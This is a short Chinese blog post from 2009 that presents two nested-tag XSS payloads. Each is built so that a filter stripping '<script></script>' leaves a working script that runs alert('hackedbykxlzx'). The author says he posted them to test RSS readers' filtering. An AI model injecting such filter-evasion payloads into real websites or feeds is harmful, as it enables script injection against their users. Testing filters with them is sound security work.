这个东西或许可以bypass一些xss过滤

作者: 空虚浪子心日期: 2009 年 01 月 13 日发表评论 (0) 查看评论

<s<script></script>cript>alert("hackedbykxlzx")<<script></script>/script>

<<script></script>script>alert("hackedbykxlzx")<<script></script>/script>
恩，放这里测几个rss的阅读器。

刚好过滤了其他的留下中间的。

0 条评论。

要发表评论，您必须先登录。